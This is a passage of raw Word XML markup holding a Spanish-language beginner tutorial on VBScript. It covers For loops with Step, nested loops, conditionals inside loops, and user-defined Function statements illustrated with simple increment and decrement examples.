          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, lo cual le indica al programa que el paso es de 1, o lo que es lo mismo: poner Step 1 es lo mismo que omitirlo. En este caso, el bucle se repetiría 10 veces, el valor final de variable1 sería 10 y el de variable2… Quien sabe…</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Pero sin duda la forma más difícil de usarlo, con resultados mas extraños, pero siempre útil saberlo sería la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umero = 1</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variable=numero - 1 To numero +1 Step numer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umero = numero +1</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variable - 1</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unque parezca raro, es completamente legal. La situación inicial sería </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">For variable = </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i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>0 To 2 Step 1</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, pero tras pasar el bucle una vez la situación sería </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>For variable = 0 To 3 Step 2</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, y a la tercera </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>For variable = 0 To 4 step 3</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">… Lo cual crearía… Si: Un bucle infinito. Bueno, en este caso lo que pasaría sería un error de desbordamiento de memoria cuando </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>los números fuesen muy grandes, pero bueno… Sin duda este ejemplo deja abiertas muchas puertas en cuanto a sucesiones numéricas y sistemas de ecuaciones se trata (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>si</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> aunque parezca que no…). Pero bueno, volvamos a lo sencillo con otro ejempl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variable=1 to 1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unciones que se ejecutaran 10 vec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or variable2=1 to 2</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unciones que se ejecutaran 20 vec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Nex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322"/>
        <w:ind w:left="93" w:right="156"/>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ejemplo, vemos un bucle dentro de otro. En este tipo de bucles hay que tener en cuenta que si el bucle principal, en este caso se repite diez veces y el secundario se repite dos veces, como el secundario esta dentro del principal, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cada vez que el principal se repita una vez el secundario lo hará dos</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y de esa forma el secundario se repetirá veinte veces. En </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>realidad</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> no es difícil. Hace falta un poco de práctica y ya está. Pongamos un último ejemplo sencill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variable=1 to 1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unciones que se repetirán 10 vec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If variable = 5 The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uncion que se realizará cuando variable se 5…</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End if</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ind w:left="93" w:right="156"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Como vemos, podemos incluir condicionales dentro de bucles, bucles dentro de bucles, condicionales dentro de condicionales y bucles dentro de condicionales. Las posibilidades son muchas y variadas, y he de recordar que esto es por ahora lo más básico de la programación en Visual Basic Script, cuando lo sepáis todo, la cosa dará a juego a muchísimo, mas de lo que os creéis; pero como en todo, lo que se necesita ante todo es práctica y práctica, así que animo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="32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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>último</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en cuanto a control de flujo básico se refiere, cabe destacar la Sentencia Function. La </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sentencia Function</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> sirve para </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">crear una función personalizada </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a partir de unas</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> otras funciones simples,</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que puede ser llamada desde cualquier parte del código. Se expresa de la siguiente forma y se coloca generalmente o al </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>principio o al final del script, por motivos de estandarización de código:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>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unction </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nombrefuncion</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variables</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unciones simples</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p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="32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w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nombrefuncion</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> es el nombre que le queremos dar a la función que hace la tarea de una variable, y </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>variables</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> son las variables que operaran en ella a las que le daremos un valor desde fuera, digamos que </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>equivale</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> por ejemplo, en la función de </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Chr</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> vista antes a sus diversas partes. </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Chr</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> sería en </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nombrefuncion</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y el valor </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>numérico</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que ponemos dentro de chr sería </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>variables</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Además, lo que hay entre Function y End Function no se ejecutará nunca en el código a no ser que </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>la llames</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la siguiente forma:</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 xml:space="preserve">Variable = </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nombrefunción</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>(variabl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Pongamos un ejemplo, para aclarar las cosas de uso de esta función con unas variables al azar (se obvia la creación de las variabl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2</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Incrementar(numer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Incrementar = numero + 1</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2 = Variable</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Incrementar(Variable2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="322"/>
        <w:ind w:left="93" w:right="156"/>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is, hemos puesto la sentencia en medio del código, pero esto es indiferente pues no se ejecutará. Aun </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>así</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> lo más correcto habría sido ponerla al principio o al final, como se muestra a continuación (el siguiente código es igual que el anterio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2</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Variable -1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:after="262"/>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Incrementar(Variable2+Variabl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Incrementar(numer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Incrementar = numero + 1</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hora vamos a lo importante: expliquemos. Primero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recibe el valor 2, y </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Variable2</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el valor 1. Hasta ahí claro. Luego, vemos que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">se le aplica a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la función incrementar de una suma (que da 3). Entonces lo que ocurre es que se llama a la función que tenemos debajo de la siguiente forma (en negrita esta </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>numero</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>):</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unction </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Incrementar(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1+2</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)</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Incrementar = (</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1+2</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>) + 1</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p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="26"/>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tal caso, la función incrementar recibe el valor 1+2+1 = 4, y se lo pasa a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por tanto,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ahora tiene el valor 4. No es difícil, solo abre tu ingenio. Veamos otro ejemplo sencillo de esto:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="3564" w:type="dxa"/>
        <w:tblInd w:w="21" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3564"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="3640"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="356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10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x = 1 To 5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 = Incrementar(Variabl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2 = Decrecer (Variable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Incrementar(numero)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="276" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="542"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ncrementar = numero + 1 End Functio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Decrecer(numer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ecrecer = numero -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tc>
      </w:tr>
    </w:tbl>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tenemos dos funciones, y el código en general lo que haría sería dar a </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Variable el valor 0 y a Variable2 el valor 100, y luego repetir 50 veces un bucle donde uno se incrementa y el otro decrece. Eso significa que este código y el que hay a continuación realizan lo mism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10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x = 1 To 5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 = Variable + 1</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2 = Variable2 - 1</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42"/>
        <w:ind w:left="93" w:right="156"/>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Como he dicho, hacen lo mismo, y a primera vista el segundo es más sencillo que el primero. Pero no lo he explicado todo sobre esta función, ahora veréis la verdadera utilidad, que reside en que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>variables</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ej. anterior </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>numero</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">) pueden ser varias.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un ejemplo que no deja de mostrar lo interesante que puede llegar a ser esto:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8589" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="158" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4588"/>
        <w:gridCol w:w="4001"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="4497"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4588"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0</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x = 1 To 100</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If Variable &lt;= 50 then</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="4"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 = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>matematicas(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Variable, True, 2)    Else</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 = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>matematicas(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
